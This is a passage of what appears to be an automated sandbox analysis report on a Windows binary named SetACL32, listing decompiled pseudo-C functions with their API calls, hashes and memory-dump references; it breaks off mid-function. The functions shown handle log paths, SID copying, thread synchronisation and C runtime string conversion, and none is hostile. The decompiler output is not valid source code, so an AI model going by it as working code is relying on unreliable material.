              • Opcode ID: 8cfee91b874d94bb0ae32828812be3aaa306158111786b4fa842ad49fdcac14d
              • Instruction ID: 49b98d21b99ca305cb394881914e6150026711a91267ebb84a49e013705c6616
              • Opcode Fuzzy Hash: 8cfee91b874d94bb0ae32828812be3aaa306158111786b4fa842ad49fdcac14d
              • Instruction Fuzzy Hash: 05B15B35D202469FDB11CF2CC8A0BBEBFF5EF56340F1A81AAD9559B341D6349901CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A9780 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 108COMMON
              Download Yara Rule
              C-Code - Quality: 46%
              			E012A9780(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v44;
				struct _CRITICAL_SECTION* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebp;
				signed int _t26;
				signed int _t27;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr* _t42;
				intOrPtr _t53;
				signed int _t55;
				intOrPtr* _t58;
				void* _t59;
				signed int _t60;
				void* _t66;

				_t73 = __fp0;
				_t56 = __edi;
				_t55 = __edx;
				_t41 = __ebx;
				_push(0xffffffff);
				_push(0x12ea165);
				_push( *[fs:0x0]);
				_t26 =  *0x1309018; // 0xedd8d3b4
				_t27 = _t26 ^ _t60;
				_v20 = _t27;
				_push(__esi);
				_push(_t27);
				_t28 =  &_v16;
				 *[fs:0x0] =  &_v16;
				_t58 = _a4;
				_v48 = 0x130b6d4;
				EnterCriticalSection(0x130b6d4);
				_v8 = 0;
				if(_t58 != 0) {
					_t42 = _t58;
					_t55 = _t42 + 2;
					do {
						_t29 =  *_t42;
						_t42 = _t42 + 2;
						__eflags = _t29;
					} while (_t29 != 0);
					__eflags = _t42 - _t55;
					_t28 = E012A1EE0(__ebx, 0x1309aa4, _t55, __edi, _t58, _t58, _t42 - _t55 >> 1);
					goto L12;
				} else {
					_t66 =  *0x1309ab4 - _t58; // 0x0
					if(_t66 != 0) {
						L12:
						LeaveCriticalSection(0x130b6d4);
						 *[fs:0x0] = _v16;
						_pop(_t59);
						return E012CAE19(_t28, _t41, _v20 ^ _t60, _t55, _t56, _t59);
					} else {
						E012A2DD0(__ebx,  &_v44, _t55, __edi, _t58, _t66, __fp0);
						_v8 = 1;
						if(_v28 != _t58) {
							_push(4);
							E01299A40( &_v44, __fp0, L".log");
						} else {
							E012A1EE0(_t41,  &_v44, _t55, __edi, _t58, L"Emergency.log", 0xd);
						}
						_t34 =  >=  ? _v44 :  &_v44;
						_t28 = E012A1EE0(_t41, 0x1309aa4, _t55, _t56, _t58,  >=  ? _v44 :  &_v44, _v28);
						_t55 = _v24;
						if(_t55 < 8) {
							goto L12;
						} else {
							_t53 = _v44;
							_t55 = 2 + _t55 * 2;
							_t35 = _t53;
							if(_t55 < 0x1000) {
								L8:
								_push(_t55);
								_t28 = E012CAE27(_t53);
								goto L12;
							} else {
								_t53 =  *((intOrPtr*)(_t53 - 4));
								_t55 = _t55 + 0x23;
								if(_t35 - _t53 + 0xfffffffc > 0x1f) {
									E012CF35F(_t41, _t53, _t55, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t60);
									_push(_t53);
									_push(_v48);
									_push(_v52);
									_push(_v56);
									return E012A98F0(_t41, _t56, _t73, 1);
								} else {
									goto L8;
								}
							}
						}
					}
				}
			}
























              0x012a9780
              0x012a9780
              0x012a9780
              0x012a9780
              0x012a9783
              0x012a9785
              0x012a9790
              0x012a9794
              0x012a9799
              0x012a979b
              0x012a979e
              0x012a979f
              0x012a97a0
              0x012a97a3
              0x012a97a9
              0x012a97b1
              0x012a97b8
              0x012a97be
              0x012a97c7
              0x012a9858
              0x012a985a
              0x012a9860
              0x012a9860
              0x012a9863
              0x012a9866
              0x012a9866
              0x012a986b
              0x012a9876
              0x00000000
              0x012a97cd
              0x012a97cd
              0x012a97d3
              0x012a987b
              0x012a9880
              0x012a9889
              0x012a9891
              0x012a989f
              0x012a97d9
              0x012a97dc
              0x012a97e1
              0x012a97eb
              0x012a97fb
              0x012a9802
              0x012a97ed
              0x012a97f4
              0x012a97f4
              0x012a9811
              0x012a981b
              0x012a9820
              0x012a9826
              0x00000000
              0x012a9828
              0x012a9828
              0x012a982b
              0x012a9832
              0x012a983a
              0x012a984c
              0x012a984c
              0x012a984e
              0x00000000
              0x012a983c
              0x012a983c
              0x012a983f
              0x012a984a
              0x012a98a2
              0x012a98a7
              0x012a98a8
              0x012a98a9
              0x012a98aa
              0x012a98ab
              0x012a98ac
              0x012a98ad
              0x012a98ae
              0x012a98af
              0x012a98b0
              0x012a98b3
              0x012a98b4
              0x012a98b7
              0x012a98ba
              0x012a98c6
              0x00000000
              0x00000000
              0x00000000
              0x012a984a
              0x012a983a
              0x012a9826
              0x012a97d3

              APIs
              • EnterCriticalSection.KERNEL32 ref: 012A97B8
              • LeaveCriticalSection.KERNEL32(0130B6D4,?,?), ref: 012A9880
                • Part of subcall function 012A2DD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?), ref: 012A2E67
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CriticalSection$EnterFileLeaveModuleName
              • String ID: .log$Emergency.log
              • API String ID: 4287384897-2332085815
              • Opcode ID: 11d00cd6bce068801bb6a99bc28266b525789870ae76821d07b92eaf6295e16d
              • Instruction ID: d7c5632710ac52ac583cda0ca33a0e562aee3a7e7c0cc32725d179bb4457418c
              • Opcode Fuzzy Hash: 11d00cd6bce068801bb6a99bc28266b525789870ae76821d07b92eaf6295e16d
              • Instruction Fuzzy Hash: 8E31F43592020AEFCF15DF95CC55BEDBBB6EB58768F40421DEA0167280DB715980CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C7820 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E012C7820(void** __ecx, long _a4) {
				void* _t4;
				long _t9;
				void** _t13;
				void* _t14;
				void** _t16;
				void* _t18;

				_t13 = _a4;
				_t16 = __ecx;
				 *__ecx = 0;
				_t4 =  *_t13;
				if(_t4 == 0 || IsValidSid(_t4) == 0) {
					 *_t16 = 0;
					return _t16;
				} else {
					_t14 =  *_t13;
					if(_t14 == 0 || IsValidSid(_t14) == 0) {
						L7:
						_t18 = 0;
					} else {
						_t9 = GetLengthSid(_t14);
						_push(1);
						_push(_t9);
						_a4 = _t9;
						_t18 = E012D4006();
						if(_t18 == 0) {
							goto L7;
						} else {
							if(CopySid(_a4, _t18, _t14) == 0) {
								E012D3434(_t18);
								goto L7;
							}
						}
					}
					 *_t16 = _t18;
					return _t16;
				}
			}









              0x012c7824
              0x012c7829
              0x012c782b
              0x012c7831
              0x012c7835
              0x012c7891
              0x012c789d
              0x012c7844
              0x012c7844
              0x012c7848
              0x012c7884
              0x012c7884
              0x012c7851
              0x012c7852
              0x012c7858
              0x012c785a
              0x012c785b
              0x012c7863
              0x012c786a
              0x00000000
              0x012c786c
              0x012c7879
              0x012c787c
              0x00000000
              0x012c7881
              0x012c7879
              0x012c786a
              0x012c7886
              0x012c788e
              0x012c788e

              APIs
              • IsValidSid.ADVAPI32(00000000,00000000,00000000,012C9605,?,012C97F0,012C9605,00000000,000000FF), ref: 012C783E
              • IsValidSid.ADVAPI32(000C46C7,?,012C97F0,012C9605,00000000,000000FF), ref: 012C784B
              • GetLengthSid.ADVAPI32(000C46C7,?,012C97F0,012C9605,00000000,000000FF), ref: 012C7852
              • CopySid.ADVAPI32(012C97F0,00000000,000C46C7,012C97F0,012C9605,00000000,000000FF), ref: 012C7871
                • Part of subcall function 012D3434: _free.LIBCMT ref: 012D3447
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Valid$CopyLength_free
              • String ID:
              • API String ID: 2555587749-0
              • Opcode ID: da5a4524c80841f84bdf461f8d028303071295c5ea034b7d5bc939807b1ea742
              • Instruction ID: c0c124ebd471bb77b59de6b03d0869f337c7607d2e0d132a300f19ac639e331b
              • Opcode Fuzzy Hash: da5a4524c80841f84bdf461f8d028303071295c5ea034b7d5bc939807b1ea742
              • Instruction Fuzzy Hash: E6017572A1121657EB205E69EC84B577F9CEF54A91F140236FB08DB200E775D410DBF0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012AA9A0 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
              Download Yara Rule
              C-Code - Quality: 81%
              			E012AA9A0(intOrPtr* __ecx, intOrPtr _a4) {
				void* __esi;
				long _t12;
				intOrPtr* _t13;
				void* _t17;
				intOrPtr _t20;
				void* _t21;
				intOrPtr* _t22;

				_t22 = __ecx;
				_t12 = WaitForSingleObject( *(__ecx + 8), 0xffffffff);
				_t25 = _t12;
				if(_t12 == 0) {
					_push(0xc);
					_t13 = E012CAE5D(_t17, _t21, _t22, _t25);
					 *_t13 = _a4;
					 *((intOrPtr*)(_t13 + 4)) = 0;
					_t20 =  *((intOrPtr*)(_t22 + 4));
					if(_t20 != 0) {
						 *((intOrPtr*)(_t20 + 4)) = _t13;
						_t20 =  *((intOrPtr*)(_t22 + 4));
					}
					 *((intOrPtr*)(_t13 + 8)) = _t20;
					 *((intOrPtr*)(_t22 + 4)) = _t13;
					if( *_t22 == 0) {
						 *_t22 = _t13;
					}
					ResetEvent( *(_t22 + 0x10));
					ReleaseMutex( *(_t22 + 8));
					return SetEvent( *(_t22 + 0xc));
				}
				return _t12;
			}










              0x012aa9a4
              0x012aa9ab
              0x012aa9b1
              0x012aa9b3
              0x012aa9b5
              0x012aa9b7
              0x012aa9c2
              0x012aa9c4
              0x012aa9cb
              0x012aa9d0
              0x012aa9d2
              0x012aa9d5
              0x012aa9d5
              0x012aa9d8
              0x012aa9de
              0x012aa9e1
              0x012aa9e3
              0x012aa9e3
              0x012aa9e8
              0x012aa9f1
              0x00000000
              0x012aa9fa
              0x012aaa02

              APIs
              • WaitForSingleObject.KERNEL32(00000008,000000FF,766DF6D0,?,?,01307820,?), ref: 012AA9AB
              • ResetEvent.KERNEL32(?,012AA793), ref: 012AA9E8
              • ReleaseMutex.KERNEL32(00000008), ref: 012AA9F1
              • SetEvent.KERNEL32(?), ref: 012AA9FA
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Event$MutexObjectReleaseResetSingleWait
              • String ID:
              • API String ID: 2375943032-0
              • Opcode ID: 61d0ede3b31b19b2c0bb4159e1178a0d95e23c3e894d6e443aef4856486ab0f1
              • Instruction ID: 7d408c9b5dddbea21ce8249c2c3aa321b3d121eb138ec43ca762ce33489152af
              • Opcode Fuzzy Hash: 61d0ede3b31b19b2c0bb4159e1178a0d95e23c3e894d6e443aef4856486ab0f1
              • Instruction Fuzzy Hash: 2A013770110302DFDB259F25E908A66BFE5FF05710B15C92DE6AA8B6A1EB31E850CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DD204 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 99%
              			E012DD204(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t63;
				intOrPtr _t65;
				signed int _t67;
				intOrPtr* _t68;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t75;
				signed int _t78;
				signed int _t80;
				signed int _t82;
				signed int _t86;
				signed int _t88;
				intOrPtr _t103;
				intOrPtr _t104;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				void* _t110;
				signed int _t113;
				signed int _t114;
				signed int _t117;
				signed int _t119;
				void* _t120;
				void* _t121;
				void* _t123;

				_t110 = __edx;
				_push(0x30);
				E012CB59C(0x12ece8e, __ebx, __edi, __esi);
				_t117 =  *(_t120 + 8);
				_t119 = 0;
				_t63 =  *(_t120 + 0xc);
				_t97 =  *(_t120 + 0x10);
				 *(_t120 - 0x28) = _t117;
				 *(_t120 - 0x1c) = _t63;
				 *(_t120 - 0x20) = 0;
				if(_t117 == 0 || _t97 != 0) {
					__eflags = _t63;
					if(__eflags != 0) {
						E012D14C0(_t120 - 0x3c, _t110,  *((intOrPtr*)(_t120 + 0x14)));
						_t65 =  *((intOrPtr*)(_t120 - 0x38));
						 *(_t120 - 4) = _t119;
						_t103 =  *((intOrPtr*)(_t65 + 8));
						__eflags = _t103 - 0xfde9;
						if(_t103 != 0xfde9) {
							__eflags = _t117;
							if(_t117 == 0) {
								__eflags =  *((intOrPtr*)(_t65 + 0xa8)) - _t119;
								if( *((intOrPtr*)(_t65 + 0xa8)) != _t119) {
									_t67 = E012DF2D2(_t103, _t119,  *(_t120 - 0x1c), 0xffffffff, _t119, _t119, _t119, _t120 - 0x20);
									__eflags = _t67;
									if(__eflags == 0) {
										L57:
										_t68 = E012D3E40(__eflags);
										__eflags = _t117;
										 *_t68 = 0x2a;
										L58:
										__eflags =  *((char*)(_t120 - 0x30));
										if( *((char*)(_t120 - 0x30)) != 0) {
											_t104 =  *((intOrPtr*)(_t120 - 0x3c));
											_t59 = _t104 + 0x350;
											 *_t59 =  *(_t104 + 0x350) & 0xfffffffd;
											__eflags =  *_t59;
										}
										goto L61;
									}
									__eflags =  *(_t120 - 0x20);
									if(__eflags != 0) {
										goto L57;
									}
									_t56 = _t67 - 1; // -1
									_t117 = _t56;
									goto L58;
								}
								_t105 =  *(_t120 - 0x1c);
								_t71 =  *_t105 & 0x0000ffff;
								__eflags = _t71;
								if(_t71 == 0) {
									L53:
									_t117 = _t119;
									goto L58;
								}
								_t117 = _t71;
								while(1) {
									__eflags = _t117 - 0xff;
									if(__eflags > 0) {
										goto L57;
									}
									_t105 =  &(_t105[1]);
									_t119 = _t119 + 1;
									_t72 =  *_t105 & 0x0000ffff;
									_t117 = _t72;
									__eflags = _t72;
									if(_t72 != 0) {
										continue;
									}
									goto L53;
								}
								goto L57;
							}
							__eflags =  *((intOrPtr*)(_t65 + 0xa8)) - _t119;
							if( *((intOrPtr*)(_t65 + 0xa8)) != _t119) {
								__eflags =  *((intOrPtr*)(_t65 + 4)) - 1;
								if( *((intOrPtr*)(_t65 + 4)) != 1) {
									_t117 = E012DF2D2(_t103, _t119,  *(_t120 - 0x1c), 0xffffffff, _t117, _t97, _t119, _t120 - 0x20);
									_t123 = _t121 + 0x20;
									__eflags = _t117;
									if(_t117 == 0) {
										__eflags =  *(_t120 - 0x20);
										if(__eflags != 0) {
											L47:
											_t75 = E012D3E40(__eflags);
											_t119 = _t119 | 0xffffffff;
											 *_t75 = 0x2a;
											goto L53;
										}
										__eflags = GetLastError() - 0x7a;
										if(__eflags != 0) {
											goto L47;
										}
										__eflags = _t97;
										if(_t97 == 0) {
											goto L58;
										}
										_t77 =  *(_t120 - 0x1c);
										while(1) {
											_t112 =  *((intOrPtr*)(_t120 - 0x38));
											_t106 =  *((intOrPtr*)( *((intOrPtr*)(_t120 - 0x38)) + 4));
											__eflags = _t106 - 5;
											if(_t106 > 5) {
												_t106 = 5;
											}
											_t78 = E012DF2D2( *((intOrPtr*)(_t112 + 8)), _t119, _t77, 1, _t120 - 0x18, _t106, _t119, _t120 - 0x20);
											_t97 =  *(_t120 + 0x10);
											_t113 = _t78;
											_t123 = _t123 + 0x20;
											__eflags = _t113;
											if(__eflags == 0) {
												goto L57;
											}
											__eflags =  *(_t120 - 0x20);
											if(__eflags != 0) {
												goto L57;
											}
											__eflags = _t113;
											if(__eflags < 0) {
												goto L57;
											}
											__eflags = _t113 - 5;
											if(__eflags > 0) {
												goto L57;
											}
											__eflags = _t113 + _t117 - _t97;
											if(_t113 + _t117 > _t97) {
												goto L58;
											}
											_t80 = _t119;
											 *(_t120 - 0x24) = _t80;
											__eflags = _t113;
											if(_t113 <= 0) {
												L45:
												_t77 =  *(_t120 - 0x1c) + 2;
												 *(_t120 - 0x1c) =  *(_t120 - 0x1c) + 2;
												__eflags = _t117 - _t97;
												if(_t117 < _t97) {
													continue;
												}
												goto L58;
											}
											_t108 =  *(_t120 - 0x28);
											while(1) {
												_t82 =  *((intOrPtr*)(_t120 + _t80 - 0x18));
												 *((char*)(_t108 + _t117)) = _t82;
												__eflags = _t82;
												if(_t82 == 0) {
													goto L58;
												}
												_t80 =  *(_t120 - 0x24) + 1;
												_t117 = _t117 + 1;
												 *(_t120 - 0x24) = _t80;
												__eflags = _t80 - _t113;
												if(_t80 < _t113) {
													continue;
												}
												goto L45;
											}
											goto L58;
										}
										goto L57;
									}
									__eflags =  *(_t120 - 0x20);
									if(__eflags != 0) {
										goto L47;
									}
									_t31 = _t117 - 1; // -1
									_t119 = _t31;
									goto L53;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									L23:
									_t119 = E012DF2D2(_t103, _t119,  *(_t120 - 0x1c), _t97, _t117, _t97, _t119, _t120 - 0x20);
									__eflags = _t119;
									if(__eflags == 0) {
										goto L47;
									}
									__eflags =  *(_t120 - 0x20);
									if(__eflags != 0) {
										goto L47;
									}
									__eflags =  *((char*)(_t117 + _t119 - 1));
									if( *((char*)(_t117 + _t119 - 1)) == 0) {
										_t119 = _t119 - 1;
									}
									goto L53;
								}
								_t86 =  *(_t120 - 0x1c);
								_t114 = _t97;
								while(1) {
									__eflags =  *_t86 - _t119;
									if( *_t86 == _t119) {
										break;
									}
									_t86 = _t86 + 2;
									_t114 = _t114 - 1;
									__eflags = _t114;
									if(_t114 != 0) {
										continue;
									}
									break;
								}
								__eflags = _t114;
								if(_t114 != 0) {
									__eflags =  *_t86 - _t119;
									if( *_t86 == _t119) {
										_t97 = (_t86 -  *(_t120 - 0x1c) >> 1) + 1;
										__eflags = (_t86 -  *(_t120 - 0x1c) >> 1) + 1;
									}
								}
								goto L23;
							}
							__eflags = _t97;
							if(_t97 == 0) {
								goto L53;
							}
							_t109 =  *(_t120 - 0x1c);
							while(1) {
								__eflags =  *_t109 - 0xff;
								if(__eflags > 0) {
									goto L47;
								}
								 *((char*)(_t117 + _t119)) =  *_t109;
								_t88 =  *_t109 & 0x0000ffff;
								_t109 = _t109 + 2;
								 *(_t120 - 0x1c) = _t109;
								__eflags = _t88;
								if(_t88 == 0) {
									goto L53;
								}
								_t119 = _t119 + 1;
								__eflags = _t119 - _t97;
								if(_t119 < _t97) {
									continue;
								}
								goto L53;
							}
							goto L47;
						}
						 *(_t120 - 0x2c) = _t119;
						 *(_t120 - 0x28) = _t119;
						_t119 = E012E3A2A(_t117, _t120 - 0x1c, _t97, _t120 - 0x2c);
						goto L53;
					} else {
						 *((intOrPtr*)(E012D3E40(__eflags))) = 0x16;
						E012CF34F();
						goto L61;
					}
				} else {
					L61:
					return E012CB55A(_t97, _t117, _t119);
				}
			}





























              0x012dd204
              0x012dd204
              0x012dd20b
              0x012dd210
              0x012dd213
              0x012dd215
              0x012dd218
              0x012dd21b
              0x012dd21e
              0x012dd221
              0x012dd226
              0x012dd233
              0x012dd235
              0x012dd255
              0x012dd25a
              0x012dd25d
              0x012dd260
              0x012dd263
              0x012dd269
              0x012dd28a
              0x012dd28c
              0x012dd431
              0x012dd437
              0x012dd470
              0x012dd478
              0x012dd47a
              0x012dd487
              0x012dd487
              0x012dd48c
              0x012dd48f
              0x012dd495
              0x012dd495
              0x012dd499
              0x012dd49b
              0x012dd49e
              0x012dd49e
              0x012dd49e
              0x012dd49e
              0x00000000
              0x012dd4a5
              0x012dd47c
              0x012dd480
              0x00000000
              0x00000000
              0x012dd482
              0x012dd482
              0x00000000
              0x012dd482
              0x012dd439
              0x012dd43c
              0x012dd43f
              0x012dd442
              0x012dd45e
              0x012dd45e
              0x00000000
              0x012dd45e
              0x012dd444
              0x012dd44b
              0x012dd44b
              0x012dd44e
              0x00000000
              0x00000000
              0x012dd450
              0x012dd453
              0x012dd454
              0x012dd457
              0x012dd459
              0x012dd45c
              0x00000000
              0x00000000
              0x00000000
              0x012dd45c
              0x00000000
              0x012dd44b
              0x012dd292
              0x012dd298
              0x012dd2d4
              0x012dd2d8
              0x012dd34e
              0x012dd350
              0x012dd353
              0x012dd355
              0x012dd369
              0x012dd36d
              0x012dd421
              0x012dd421
              0x012dd426
              0x012dd429
              0x00000000
              0x012dd429
              0x012dd379
              0x012dd37c
              0x00000000
              0x00000000
              0x012dd382
              0x012dd384
              0x00000000
              0x00000000
              0x012dd38a
              0x012dd38d
              0x012dd38d
              0x012dd390
              0x012dd393
              0x012dd396
              0x012dd39a
              0x012dd39a
              0x012dd3ac
              0x012dd3b1
              0x012dd3b4
              0x012dd3b6
              0x012dd3b9
              0x012dd3bb
              0x00000000
              0x00000000
              0x012dd3c1
              0x012dd3c5
              0x00000000
              0x00000000
              0x012dd3cb
              0x012dd3cd
              0x00000000
              0x00000000
              0x012dd3d3
              0x012dd3d6
              0x00000000
              0x00000000
              0x012dd3df
              0x012dd3e1
              0x00000000
              0x00000000
              0x012dd3e7
              0x012dd3e9
              0x012dd3ec
              0x012dd3ee
              0x012dd40e
              0x012dd411
              0x012dd414
              0x012dd417
              0x012dd419
              0x00000000
              0x00000000
              0x00000000
              0x012dd41f
              0x012dd3f0
              0x012dd3f3
              0x012dd3f3
              0x012dd3f7
              0x012dd3fa
              0x012dd3fc
              0x00000000
              0x00000000
              0x012dd405
              0x012dd406
              0x012dd407
              0x012dd40a
              0x012dd40c
              0x00000000
              0x00000000
              0x00000000
              0x012dd40c
              0x00000000
              0x012dd3f3
              0x00000000
              0x012dd38d
              0x012dd357
              0x012dd35b
              0x00000000
              0x00000000
              0x012dd361
              0x012dd361
              0x00000000
              0x012dd361
              0x012dd2da
              0x012dd2dc
              0x012dd301
              0x012dd313
              0x012dd318
              0x012dd31a
              0x00000000
              0x00000000
              0x012dd320
              0x012dd324
              0x00000000
              0x00000000
              0x012dd32a
              0x012dd32f
              0x012dd335
              0x012dd335
              0x00000000
              0x012dd32f
              0x012dd2de
              0x012dd2e1
              0x012dd2e3
              0x012dd2e3
              0x012dd2e6
              0x00000000
              0x00000000
              0x012dd2e8
              0x012dd2eb
              0x012dd2eb
              0x012dd2ee
              0x00000000
              0x00000000
              0x00000000
              0x012dd2ee
              0x012dd2f0
              0x012dd2f2
              0x012dd2f4
              0x012dd2f7
              0x012dd300
              0x012dd300
              0x012dd300
              0x012dd2f7
              0x00000000
              0x012dd2f2
              0x012dd29a
              0x012dd29c
              0x00000000
              0x00000000
              0x012dd2a2
              0x012dd2aa
              0x012dd2aa
              0x012dd2ad
              0x00000000
              0x00000000
              0x012dd2b5
              0x012dd2b8
              0x012dd2bb
              0x012dd2be
              0x012dd2c1
              0x012dd2c4
              0x00000000
              0x00000000
              0x012dd2ca
              0x012dd2cb
              0x012dd2cd
              0x00000000
              0x00000000
              0x00000000
              0x012dd2cf
              0x00000000
              0x012dd2aa
              0x012dd26e
              0x012dd276
              0x012dd283
              0x00000000
              0x012dd237
              0x012dd23c
              0x012dd242
              0x00000000
              0x012dd247
              0x012dd22c
              0x012dd4a7
              0x012dd4ac
              0x012dd4ac

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: H_prolog3_
              • String ID: @Mhv
              • API String ID: 2427045233-3595611156
              • Opcode ID: ceadd96d5f5ff0fe62cea1b999006cc63591af9e57b62fee0874151dd3b3e0a1
              • Instruction ID: 1e585e9be4838daa0ba92686055bc242be1860664f3118e05f25abfc2bc91482
              • Opcode Fuzzy Hash: ceadd96d5f5ff0fe62cea1b999006cc63591af9e57b62fee0874151dd3b3e0a1
              • Instruction Fuzzy Hash: 05719F75D20A5F9BDF218FD8C884AFEBAB5FF49360F144129EA10672C1DB75A841CB60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D555D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 012D55ED
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: 0faaa9d712d958b71a63199382906168acb9774bc11b500a81f1f0c515f23c80
              • Instruction ID: 7f6055837a3dd5b74db3b6e66aab8ceaeb7fe259cc79162fe203d96b669fb7c2
              • Opcode Fuzzy Hash: 0faaa9d712d958b71a63199382906168acb9774bc11b500a81f1f0c515f23c80
              • Instruction Fuzzy Hash: 3E518F61A391038ADB13BB1CE9013797FB4FB00750F258D69E2D2892DDEBB184948B86
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C9750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 192COMMON
              Download Yara Rule
              C-Code - Quality: 31%
              			E012C9750(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, unsigned int* _a4, signed int _a8) {
				unsigned int _v8;
				char _v16;
				unsigned int _v20;
				intOrPtr* _v24;
				unsigned int _v32;
				char _v36;
				signed int _t64;
				unsigned int _t71;
				unsigned int _t74;
				signed int _t85;
				unsigned int* _t86;
				void* _t87;
				void* _t88;
				intOrPtr* _t92;
				unsigned int* _t93;
				signed int _t96;
				intOrPtr* _t97;
				unsigned int _t102;
				intOrPtr _t105;
				intOrPtr _t106;
				signed int _t110;
				char _t115;
				signed int _t117;
				unsigned int _t118;
				unsigned int _t120;
				unsigned int _t124;
				intOrPtr* _t126;
				unsigned int _t128;
				signed int _t135;
				void* _t136;
				void* _t138;
				long long _t145;

				_push(0xffffffff);
				_push(0x12ece05);
				_push( *[fs:0x0]);
				_t136 = _t135 - 0x14;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t64 =  *0x1309018; // 0xedd8d3b4
				_push(_t64 ^ _t135);
				 *[fs:0x0] =  &_v16;
				_t117 = __ecx;
				_t95 = _a8;
				_a8 = E012C8BB0(_a8);
				E012C9B70(_t117,  &_v36, _a8, _t67);
				_t102 = _v32;
				if(_t102 == 0) {
					__eflags =  *((intOrPtr*)(_t117 + 8)) - 0x4444444;
					if(__eflags == 0) {
						_push("unordered_map/set too long");
						E012CA09E();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(__esi);
						_push(_t117);
						_t118 = _t102;
						_t124 =  *(_t118 + 4);
						__eflags = _t124;
						if(_t124 != 0) {
							E012A6F20(_t95, _t124 + 0xc, _t124);
							_t74 =  *(_t124 + 8);
							__eflags = _t74;
							if(_t74 != 0) {
								E012D3434(_t74);
								_t136 = _t136 + 4;
								 *(_t124 + 8) = 0;
							}
						}
						_t71 =  *(_t118 + 4);
